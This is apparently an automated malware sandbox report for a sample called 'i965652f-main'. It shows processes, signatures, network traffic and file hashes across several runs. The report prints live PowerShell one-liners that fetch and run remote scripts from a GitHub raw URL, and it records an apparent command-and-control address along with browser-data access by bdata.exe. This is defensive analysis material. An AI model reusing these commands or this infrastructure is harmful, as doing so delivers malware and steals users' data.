| PID 3240 wrote to memory of 1672 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3240 wrote to memory of 1672 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\i965652f-main\svhost.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$script = iwr http://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1; invoke-expression $script"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:80 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| US | 8.8.8.8:53 | 8.153.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp |
Files
memory/1672-0-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp
memory/1672-7-0x000001D0618F0000-0x000001D061912000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2oi2u0te.pny.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1672-11-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
memory/1672-12-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
memory/1672-13-0x000001D07B550000-0x000001D07BCF6000-memory.dmp
memory/1672-15-0x00007FFB39E23000-0x00007FFB39E25000-memory.dmp
memory/1672-16-0x00007FFB39E20000-0x00007FFB3A8E1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240708-en
Max time kernel
134s
Max time network
136s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\m.ps1
Network
| Country | Destination | Domain | Proto |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp | |
| IN | 64.227.161.180:4443 | tcp |
Files
memory/1500-4-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1500-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/1500-7-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-6-0x00000000022A0000-0x00000000022A8000-memory.dmp
memory/1500-8-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-10-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-9-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-11-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
memory/1500-12-0x000007FEF5D2E000-0x000007FEF5D2F000-memory.dmp
memory/1500-13-0x000007FEF5A70000-0x000007FEF640D000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240729-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe
"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
138s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\e.ps1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/4388-0-0x00007FFF66363000-0x00007FFF66365000-memory.dmp
memory/4388-1-0x000001459B590000-0x000001459B5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zox3i0nt.io2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4388-11-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
memory/4388-12-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
memory/4388-15-0x00007FFF66360000-0x00007FFF66E21000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win7-20240903-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2672 wrote to memory of 2584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
Network
Files
memory/2672-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp
memory/2672-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
memory/2672-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2672-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 15949652452d63a0038444a725cc7945 |
| SHA1 | a3da3f48ae9ef882ec9cb2b089684a7aa755ebe6 |
| SHA256 | ecb4c8f2a83ee45e03f6c591ed6b20ee244d80429b43b66317dd59677c14eb2c |
| SHA512 | 4be22050b6bc257c842b85d14f5bc01d2487344b815f328a7139ade6895215799ed5750b6fbf14d8dbdfac4b8f9b8f85dd46d9c7564163349d1cfcb2edbcd2ce |
memory/2584-18-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2672-17-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
memory/2584-19-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
92s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3424 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3424-0-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp
memory/3424-10-0x000001533F760000-0x000001533F782000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4zzno4.he4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3424-11-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/3424-12-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
memory/2460-17-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/3424-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 83449265ddea29564af2cefc93493459 |
| SHA1 | 8068c5f88cf4ba3e5f10fa864461c72f9d368d4d |
| SHA256 | 26ce8143a8c7ba0a96779bdacab1ee547b89840abd1d1cb4a8d8b2d99d72e8e9 |
| SHA512 | 89b342aa6fd4a83ed99f6030b1e7bffb63c8ee3eddbba7324e5a265a1968536c4de28e42ecdee13566ef2c3904cfc3ecb7bd33d58d2d3b5d6c7f0ae476203e9d |
memory/2460-28-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
memory/2460-29-0x00000172AA730000-0x00000172AAED6000-memory.dmp
memory/2460-32-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-17 06:15
Reported
2025-01-17 06:17
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
151s
Command Line
Signatures
Reads user/profile data of web browsers
Browser Information Discovery
Processes
C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe
"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.98.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.129.81.91.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT.bak
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |